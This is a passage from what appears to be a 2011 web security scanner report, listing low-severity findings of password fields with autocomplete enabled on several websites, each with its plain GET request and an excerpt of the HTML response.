User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

15.180. http://www.thefeast.com/boston/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • regPassword

Request

GET /boston/ HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:22:48 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:31 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 280280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://o
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

15.181. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • loginPassword

Request

GET /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

15.182. http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • regPassword

Request

GET /boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r2-u21
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

15.183. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • loginPassword

Request

GET /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

15.184. http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • regPassword

Request

GET /boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:42 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

15.185. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • loginPassword

Request

GET /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</form>


<form id="loginForm" name="loginForm" action="/i/dispatcher/?h=feastuser" method="post">
<span class="loginAlreadyMeetText">
...[SNIP]...
</label>
<input id="loginPassword" name="loginPassword" type="password" tabindex="116" size="20" />
<!--onkeydown='javascript: //if(event.keyCode==13) submitLoginForm();'-->
...[SNIP]...

15.186. http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thefeast.com
Path:   /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html

Issue detail

The page contains a form with the following action URL:
  • http://www.thefeast.com/i/dispatcher/?h=feastuser
The form contains the following password field with autocomplete enabled:
  • regPassword

Request

GET /boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html HTTP/1.1
Host: www.thefeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 24 Jan 2011 23:24:38 GMT
X-Server-Name: sj-c14-r8-u31-b7
Content-Type: text/html;charset=utf-8
Expires: Tue, 25 Jan 2011 00:09:35 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282213


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
</div>


<form id="regForm" name="regForm" action="/i/dispatcher/?h=feastuser" method="post" enctype="multipart/form-data">


<div class="formContent">
...[SNIP]...
</label>
<input id="regPassword" name="regPassword" type="password" size="20" tabindex="109"/>
<span class="errorText">
...[SNIP]...

15.187. http://www.usaca.info/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usaca.info
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.usaca.info/index.php
The form contains the following password field with autocomplete enabled:
  • passwd

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3730abe3084fe49ecac82b2df16b8c34=t18frpf95fah7u5jd67rlg4355; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 15-Jan-2012 04:39:36 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 04:39:36 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
</h3>
                   <form action="index.php" method="post" name="form-login" id="form-login" >
   USACA Contributor Login:    <fieldset class="input">
...[SNIP]...
<br />
           <input type="password" name="passwd" id="passwd" class="inputbox" size="18" alt="password" />
       </label>
...[SNIP]...

15.188. http://www.w-w-i.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.w-w-i.com/logoffon.php
The form contains the following password field with autocomplete enabled:
  • pword

Request

GET / HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:55 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=104b6d5a3b663e017fccb9e7614f776c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11624

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Online Press Office</title>
<meta name="keywords" content="World Wi
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

15.189. http://www.w-w-i.com/velux_5_oceans_2010_race/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.w-w-i.com
Path:   /velux_5_oceans_2010_race/

Issue detail

The page contains a form with the following action URL:
  • http://www.w-w-i.com/velux_5_oceans_2010_race/logoffon.php
The form contains the following password field with autocomplete enabled:
  • pword

Request

GET /velux_5_oceans_2010_race/ HTTP/1.1
Host: www.w-w-i.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="/velux_5_oceans_2010_race/logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

15.190. http://www.woothemes.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.woothemes.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.woothemes.com/wp-login.php
The form contains the following password field with autocomplete enabled:
  • pwd

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:10:45 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 25957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div><form name="loginform" action="http://www.woothemes.com/wp-login.php" method="post"> <label for="userid" class="fl">
...[SNIP]...
</label> <input class="password fr" type="password" name="pwd" value="" id="password" size="10"/><div class="fix">
...[SNIP]...

15.191. http://www.x64bitdownload.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:30:39 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.192. http://www.x64bitdownload.com/64-bit-archive-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-archive-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-archive-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93426


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.193. http://www.x64bitdownload.com/64-bit-assembling-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-assembling-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-assembling-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.194. http://www.x64bitdownload.com/64-bit-atom-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-atom-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-atom-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.195. http://www.x64bitdownload.com/64-bit-audio-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-audio-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-audio-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.196. http://www.x64bitdownload.com/64-bit-automatic-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-automatic-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-automatic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.197. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-autoposter-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-autoposter-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.198. http://www.x64bitdownload.com/64-bit-binaries-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binaries-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

